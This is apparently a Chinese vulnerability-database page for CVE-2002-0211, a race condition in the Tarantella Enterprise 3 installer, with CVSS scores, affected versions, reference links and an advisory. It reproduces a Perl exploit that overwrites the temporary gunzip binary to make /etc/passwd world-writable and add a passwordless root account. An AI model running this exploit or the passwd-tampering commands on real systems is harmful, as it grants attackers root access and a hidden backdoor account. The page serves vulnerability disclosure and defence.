CVE-2002-0211
CVSS6.2
发布时间 :2002-05-16 00:00:00
修订时间 :2016-10-17 22:17:09
NMCOE    

[原文]Race condition in the installation script for Tarantella Enterprise 3 3.01 through 3.20 creates a world-writeable temporary "gunzip" program before executing it, which could allow local users to execute arbitrary commands by modifying the program before it is executed.


[CNNVD]Tarantella Enterprise 3 gunzip竞争条件漏洞(CNNVD-200205-031)

        
        Tarantella Enterprise 3是一个基于Web的集中化的IT应用环境控制软件。
        Tarantella Enterprise在安装过程中存在竞争条件问题,可以使本地攻击者得到主机的root权限。
        在安装过程中,程序会在$TMPDIR环境变量指定的临时文件目录(通常是/tmp)中创建一个二进制的gunzip文件,此文件的文件名一般是gunzip$$,$$代表了进程号,安装程序会以root身份在以后的安装过程中用到这个gunzip程序。这个gunzip程序在被创建时是全局可读写的,如果能在它被使用之前以其他的可执行程序替换之,则可能以root身份执行任意命令。此漏洞只有软件安装时才可能被利用。
        

- CVSS (基础分值)

CVSS分值: 6.2 [中等(MEDIUM)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:tarantella:tarantella_enterprise:3.3.11
cpe:/a:tarantella:tarantella_enterprise:3.3.10
cpe:/a:tarantella:tarantella_enterprise:3.3.20
cpe:/a:tarantella:tarantella_enterprise:3.3.0
cpe:/a:tarantella:tarantella_enterprise:3.3.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0211
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0211
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-031
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101208650722179&w=2
(UNKNOWN)  BUGTRAQ  20020126 Vulnerability report for Tarantella Enterprise 3.
http://online.securityfocus.com/archive/1/265845
(UNKNOWN)  BUGTRAQ  20020404 Exploit for Tarantella Enterprise 3 installation (BID 3966)
http://www.iss.net/security_center/static/7996.php
(VENDOR_ADVISORY)  XF  tarantella-gunzip-tmp-race(7996)
http://www.securityfocus.com/bid/3966
(UNKNOWN)  BID  3966
http://www.tarantella.com/security/bulletin-04.html
(VENDOR_ADVISORY)  CONFIRM  http://www.tarantella.com/security/bulletin-04.html

- 漏洞信息

Tarantella Enterprise 3 gunzip竞争条件漏洞
中危 竞争条件
2002-05-16 00:00:00 2005-10-12 00:00:00
本地  
        
        Tarantella Enterprise 3是一个基于Web的集中化的IT应用环境控制软件。
        Tarantella Enterprise在安装过程中存在竞争条件问题,可以使本地攻击者得到主机的root权限。
        在安装过程中,程序会在$TMPDIR环境变量指定的临时文件目录(通常是/tmp)中创建一个二进制的gunzip文件,此文件的文件名一般是gunzip$$,$$代表了进程号,安装程序会以root身份在以后的安装过程中用到这个gunzip程序。这个gunzip程序在被创建时是全局可读写的,如果能在它被使用之前以其他的可执行程序替换之,则可能以root身份执行任意命令。此漏洞只有软件安装时才可能被利用。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 安装软件的时候注意环境中是不是有不可信的用户在线。
        厂商补丁:
        Tarantella
        ----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.tarantella.com/products/e3/

- 漏洞信息 (21244)

Tarantella Enterprise 3 gunzip Race Condition Vulnerability (EDBID:21244)
unix local
2002-02-08 Verified
0 Larry Cashdollar
N/A [点击下载]
source: http://www.securityfocus.com/bid/3966/info

Tarantella Enterprise 3 is vulnerable to a race condition during the installation process. During installation, a root owned binary is created in /tmp (the directory specified by the $TMPDIR environment variable) with the name gunzip#### where #### is a PID. Prior to it being invoked by the installation program it can be overwritten by a local user. This is then run by the installation program with root privileges.

An attacker can only gain privileges in this manner if a privileged user is installing the software.

#!/usr/bin/perl -w
#Another Exploit for tarantella enterprise 3 installation.
#Larry Cashdollar lwc@vapid.dhs.org 2/08/2002
#Exploits gunzip$$ binary being created in /tmp with perm 777
#http://online.securityfocus.com/bid/3966
#Experimental ext3 kernel mods for preventing/researching race conditions.
#http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html

use strict;

`cat  <<  -EOF- > root.sh
#!/bin/sh
chmod 777 /etc/passwd
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
-EOF-`;

my $OUT = '';

while(!$OUT) {
	$OUT =  `ps -ax |grep gunzip |grep -v grep`;
        print "Found $OUT\n";
}

my @args  = split(' ',$OUT);
# Do this with one copy operation. This will break installation of tarantella.
# should test for -w on /etc/passwd stop and su - tarexp.
while(1) {
`cp root.sh $args[4]`;
}		

- 漏洞信息

2036
Tarantella Enterprise 3 gunzip Race Condition
Local Access Required Race Condition
Loss of Integrity Workaround
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2002-01-26 Unknow
2002-01-26 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站